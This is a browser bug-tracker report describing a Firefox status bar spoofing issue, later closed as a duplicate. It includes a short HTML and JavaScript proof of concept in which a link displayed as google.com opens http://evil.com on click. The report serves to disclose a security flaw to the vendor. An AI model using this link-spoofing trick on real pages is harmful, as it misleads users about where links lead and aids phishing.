Status

()

Firefox
Untriaged
RESOLVED DUPLICATE of bug 1310432
a year ago
a year ago

People

(Reporter: shankar, Unassigned)

Tracking

49 Branch
All
Windows 7
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

(Reporter)

Description

a year ago
Created attachment 8801474 [details]
firefox Status Bar Obfuscation.mp4

STEPS TO REPRODUCE:-

1.Save the below script as html file (test.html i saved here)

<h1>
<a href="http://google.com" onclick="javascript:OB();">https://google.com</a>
</h1>
 
<script>
 
function OB() {
 
document.write('');
window.close();
window.open('http://evil.com');
 
}
 
</script>


2.Open the HTML file in Firefox browser 
3.You will see a hyperlink of google.com, So hover your mouse.
4.See the Status Bar(located at the lower left of the browser) and you will see the link where it should be redirected
5.Now, click the hyperlink and you will be redirected to another website which is not the expected website.

ACTUAL RESULT:-

On mouse over to hyperlink it shows the url is https://google.com,
On click that it  redirects to http://evil.com/

EXPECTED RESULT:-

The status bar url should show the correct url that is going to redirect.

Video POC is attached below

Updated

a year ago
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: a year ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1310432
You need to log in before you can comment on or make changes to this bug.